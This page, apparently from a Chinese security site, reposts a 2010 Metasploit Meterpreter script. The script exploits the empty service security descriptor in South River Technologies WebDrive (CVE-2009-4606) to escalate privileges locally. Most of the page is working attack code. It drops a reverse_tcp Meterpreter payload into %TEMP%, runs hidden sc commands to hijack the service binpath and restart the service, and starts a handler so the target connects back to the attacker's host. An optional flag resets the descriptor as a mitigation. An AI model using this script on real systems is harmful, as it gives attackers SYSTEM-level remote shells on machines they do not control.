首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
South River Technologies WebDrive Service Bad Security Descriptor Local Privileg
来源:http://www.rec-sec.com 作者:Trancer 发布时间:2010-01-27  

##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
#
#  This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
#  Due to an empty security descriptor, a local attacker can gain elevated privileges.
#  Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
#  Vulnerability mitigation featured.
#
#  Credit:
#   - Discovery   - Nine:Situations:Group::bellick
#   - Meterpreter script - Trancer
#
#  References:
#   - http://retrogod.altervista.org/9sg_south_river_priv.html
#   - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
#   - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
#   - http://osvdb.org/show/osvdb/59080
#
#  mtrancer[@]gmail.com
http://www.rec-sec.com
##

#
# Options
#
opts = Rex::Parser::Arguments.new(
 "-h"  => [ false,  "This help menu"],
 "-m"  => [ false,  "Mitigate"],
 "-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
 "-p"  => [ true,   "The port on the remote host where Metasploit is listening"]
)

#
# Default parameters
#

rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4444
sname = 'WebDriveService'
pname = 'wdService.exe'

#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
 case opt
 when "-h"
  print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
  print_line(opts.usage)
  raise Rex::Script::Completed
 when "-m"
  client.sys.process.get_processes().each do |m|
   if ( m['name'] == pname )
    print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
    
    # Set correct service security descriptor to mitigate the vulnerability
    print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
    client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
   end
  end
  raise Rex::Script::Completed
 when "-r"
  rhost = val
 when "-p"
  rport = val.to_i
 end
end

client.sys.process.get_processes().each do |m|
 if ( m['name'] == pname )

  print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")

  # Build out the exe payload.
  pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
  pay.datastore['LHOST'] = rhost
  pay.datastore['LPORT'] = rport
  raw  = pay.generate

  exe = Msf::Util::EXE.to_win32pe(client.framework, raw)

  # Place our newly created exe in %TEMP%
  tempdir = client.fs.file.expand_path("%TEMP%")
  tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
  print_status("Sending EXE payload '#{tempexe}'.")
  fd = client.fs.file.new(tempexe, "wb")
  fd.write(exe)
  fd.close

  # Stop the vulnerable service
  print_status("Stopping service \"#{sname}\"...")
  client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})

  # Set exe payload as service binpath
  print_status("Setting \"#{sname}\" to #{tempexe}...")
  client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
  sleep(1)
  
  # Restart the service
  print_status("Restarting the \"#{sname}\" service...")
  client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})

  # Our handler to recieve the callback.
  handler = client.framework.exploits.create("multi/handler")
  handler.datastore['PAYLOAD']   = "windows/meterpreter/reverse_tcp"
  handler.datastore['LHOST']     = rhost
  handler.datastore['LPORT']     = rport
  handler.datastore['ExitOnSession']  = false

  handler.exploit_simple(
   'Payload' => handler.datastore['PAYLOAD'],
   'RunAsJob' => true
  )

  # Set service binpath back to normal
  client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
   
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AIC Audio Player 1.4.1.587 Loc
·KOL WaveIOX 1.04 (.wav) Local
·Status2k remote add administra
·Winamp 5.572 Exploit - SEH
·BoastMachine version 3.1 suffe
·Internet Explorer 6/7 - Local
·P2GChinchilla HTTP Server vers
·Status2k Remote Add Admin Expl
·Mod_proxy from apache 1.3 - In
·AOL 9.5 Phobos.Playlist 'Impor
·MySQL yaSSL SSL Hello Message
·Winamp v5.572 whatsnew.txt Loc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved